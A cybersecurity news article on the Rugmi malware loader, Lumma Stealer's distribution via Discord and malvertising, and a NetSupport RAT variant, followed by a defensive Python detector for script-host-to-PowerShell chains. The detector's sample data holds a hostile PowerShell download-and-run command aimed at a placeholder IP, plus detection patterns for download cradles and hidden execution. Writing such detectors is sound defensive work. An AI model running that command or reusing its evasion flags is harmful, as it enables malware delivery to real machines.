A new malware loader is being used by threat actors to deliver a wide range of information stealers such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms.
Cybersecurity firm ESET is tracking the trojan under the name Win/TrojanDownloader.Rugmi.
“This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk,” the company said in its Threat Report H2 2023.
Telemetry data gathered by the company shows that detections for the Rugmi loader spiked in October and November 2023, surging from single-digit daily numbers to hundreds per day.
Stealer malware is typically sold under a malware-as-a-service (MaaS) model to other threat actors on a subscription basis. Lumma Stealer, for instance, is advertised on underground forums for $250 a month. The most expensive plan costs $20,000, but it also gives buyers access to the source code and the right to sell it.
There is evidence to suggest that the codebase associated with the Mars, Arkei, and Vidar stealers has been repurposed to create Lumma.
Besides continuously adapting its tactics to evade detection, the off-the-shelf tool is distributed through multiple methods ranging from malvertising to fake browser updates to cracked installations of popular software such as VLC media player and OpenAI ChatGPT.
Another technique concerns the use of Discord’s content delivery network (CDN) to host and propagate the malware, as revealed by Trend Micro in October 2023.
This involves leveraging a combination of random and compromised Discord accounts to send direct messages to potential targets, offering them $10 or a Discord Nitro subscription in exchange for their help on a project.
Users who accept the offer are then urged to download an executable file hosted on Discord CDN that masquerades as iMagic Inventory but, in reality, contains the Lumma Stealer payload.
“Ready-made malware solutions contribute to the proliferation of malicious campaigns because they make the malware available even to potentially less technically skilled threat actors,” ESET said.
“Offering a broader range of functions then serves to render Lumma Stealer even more attractive as a product.”
The disclosures come as McAfee Labs disclosed a new variant of NetSupport RAT, which emerged from its legitimate progenitor NetSupport Manager and has since been put to use by initial access brokers to gather information and perform additional actions on victims of interest.
“The infection begins with obfuscated JavaScript files, serving as the initial point of entry for the malware,” McAfee said, adding that it highlights the “evolving tactics employed by cybercriminals.”
The execution of the JavaScript file advances the attack chain by running PowerShell commands to retrieve the remote control and stealer malware from an actor-controlled server. The campaign’s primary targets include the U.S. and Canada.
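The script-host-to-PowerShell step McAfee describes is a parent/child relationship that endpoint telemetry can surface. As an added example (not code from the article, ESET or McAfee), the Python check below runs over constructed Sysmon-style process-creation events and flags wscript.exe or cscript.exe spawning PowerShell, raising severity when the command line carries download-cradle or console-hiding indicators; the field names follow Sysmon Event ID 1, and the events and the IP address are made up.

```python
import re

# Constructed, hypothetical process-creation events in the shape of Sysmon
# Event ID 1 fields; they are not telemetry from the campaign described above.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -ep bypass -c "iwr http://203.0.113.5/c.bin -OutFile $env:TEMP\c.exe"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Get-ChildItem C:\Users"},
    {"ParentImage": r"C:\Windows\System32\cscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # Windows Script Host binaries
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line fragments typical of a download-and-execute cradle or of an
# attempt to hide the console; each match is reported as a named indicator.
CRADLE_PATTERNS = {
    "web_download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
}

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so image comparisons ignore case."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_suspicious(events):
    """Return [(index, severity, indicators)] for script-host -> PowerShell chains."""
    hits = []
    for i, ev in enumerate(events):
        if basename(ev["ParentImage"]) not in SCRIPT_HOSTS:
            continue
        if basename(ev["Image"]) not in POWERSHELL:
            continue
        indicators = [name for name, rx in CRADLE_PATTERNS.items()
                      if rx.search(ev["CommandLine"])]
        # A script host launching PowerShell is already worth a look; cradle
        # indicators on top of it raise the finding to high severity.
        hits.append((i, "high" if indicators else "medium", indicators))
    return hits

if __name__ == "__main__":
    for idx, sev, ind in find_suspicious(SAMPLE_EVENTS):
        print(f"event {idx}: {sev} {ind}")
```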